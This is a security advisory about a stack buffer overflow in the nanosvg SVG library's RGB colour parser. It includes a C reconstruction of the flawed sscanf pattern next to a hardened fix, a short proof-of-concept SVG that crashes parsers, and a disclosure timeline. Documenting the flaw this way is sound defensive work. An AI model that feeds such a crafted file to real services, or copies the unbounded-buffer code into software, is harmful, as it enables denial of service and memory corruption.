SVG nanosvg Library Memory Corruption / Denial Of Service

The SVG nanosvg library suffers from a denial of service vulnerability due to a memory corruption bug.

MD5 | a92b210d4f5bd9069939f2dfef6879aa

The SVG library nanosvg [0] suffers from a memory corruption bug (a stack buffer overflow, as the stack-protector abort in the PoC below shows) that leads to at least a DoS.

The bug is in the `nsvg__parseColorRGB` function, which is reached whenever a malicious SVG file is parsed through `nsvgParseFromFile` or `nsvgParse`. Any library or package that provides bindings to nanosvg should therefore be affected as well, for example:

- Lua:
- Python:
- Java:
- Rust:

More information available in the issue [1] and the blogpost [2].
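The following is an added example, not code from nanosvg or from the advisory author. It reconstructs the shape of the bug the advisory describes (an `sscanf` scanset with no field width filling a fixed-size stack buffer) next to a hardened variant, and feeds a constructed input modelled on the PoC below to the hardened one. The function names `parse_rgb_vulnerable`, `parse_rgb_hardened`, `hardened_or_reject`, `rgb_pack` and `poc_color`, the 32-byte buffer size and the pixel layout are assumptions of this example and are not taken from the page.

```c
#include <stdio.h>
#include <string.h>

/* Pack r, g, b into 0x00BBGGRR. This layout is an assumption made so the
 * example is self-contained; it is not taken from the advisory. */
static unsigned int rgb_pack(int r, int g, int b)
{
    return ((unsigned int)r) | ((unsigned int)g << 8) | ((unsigned int)b << 16);
}

/* Vulnerable shape (reconstruction, not verbatim library code): the two
 * %[...] scansets carry no field width, so a run of '%' (or ',', ' ', '\t')
 * longer than 31 characters writes past s1 on the stack. Only ever call this
 * with short, trusted input. */
static unsigned int parse_rgb_vulnerable(const char *str)
{
    int r = -1, g = -1, b = -1;
    char s1[32] = "", s2[32] = "";
    sscanf(str + 4, "%d%[%%, \t]%d%[%%, \t]%d", &r, s1, &g, s2, &b);
    if (strchr(s1, '%'))
        return rgb_pack((r * 255) / 100, (g * 255) / 100, (b * 255) / 100);
    return rgb_pack(r, g, b);
}

static int clampi(int v, int lo, int hi)
{
    return v < lo ? lo : (v > hi ? hi : v);
}

/* Hardened variant: scansets bounded to 31 characters plus the NUL, an
 * explicit check that all five conversions matched, and clamping of the
 * components before scaling/packing. Returns 1 and sets *out on success,
 * 0 on malformed input. */
static int parse_rgb_hardened(const char *str, unsigned int *out)
{
    int r = -1, g = -1, b = -1;
    char s1[32] = "", s2[32] = "";
    if (strncmp(str, "rgb(", 4) != 0)
        return 0;
    if (sscanf(str + 4, "%d%31[%%, \t]%d%31[%%, \t]%d", &r, s1, &g, s2, &b) != 5)
        return 0;
    if (strchr(s1, '%')) {
        r = (clampi(r, 0, 100) * 255) / 100;
        g = (clampi(g, 0, 100) * 255) / 100;
        b = (clampi(b, 0, 100) * 255) / 100;
    }
    *out = rgb_pack(clampi(r, 0, 255), clampi(g, 0, 255), clampi(b, 0, 255));
    return 1;
}

/* Convenience wrapper: 0xFFFFFFFF signals that the value was rejected. */
static unsigned int hardened_or_reject(const char *str)
{
    unsigned int c;
    return parse_rgb_hardened(str, &c) ? c : 0xFFFFFFFFu;
}

/* Constructed input modelled on the advisory's PoC: "rgb(0" followed by a
 * run of '%' far longer than a 32-byte buffer, then ")". */
static const char *poc_color(void)
{
    static char buf[128];
    memset(buf, '%', sizeof buf);
    memcpy(buf, "rgb(0", 5);
    buf[sizeof buf - 2] = ')';
    buf[sizeof buf - 1] = '\0';
    return buf;
}

int main(void)
{
    unsigned int c;
    printf("rgb(255, 0, 10) -> 0x%06X\n", parse_rgb_vulnerable("rgb(255, 0, 10)"));
    printf("PoC accepted by hardened parser: %s\n",
           parse_rgb_hardened(poc_color(), &c) ? "yes" : "no (rejected)");
    return 0;
}
```

With the PoC input the hardened parser stops after 31 separator characters, the following `%d` fails on the next `%`, `sscanf` reports 2 matched conversions instead of 5, and the value is rejected without touching memory beyond `s1`. A width on every `%s` and `%[` conversion is the general rule; the overflow here is the standard consequence of omitting it.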

# PoC

> <svg>
> <circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
> </svg>

> $> ./test poc.svg
> *** stack smashing detected ***: <unknown> terminated
> fish: “./test poc.svg” terminated by signal SIGABRT (Abort)

# Timeline
- Late 2018: bug discovered by Sebastian Neef using AFL
- 16th Nov 2018 opened issue [1]
- 19th Feb 2019 CVE assigned by DWF
- 24th Feb 2019 blogpost [2] and email published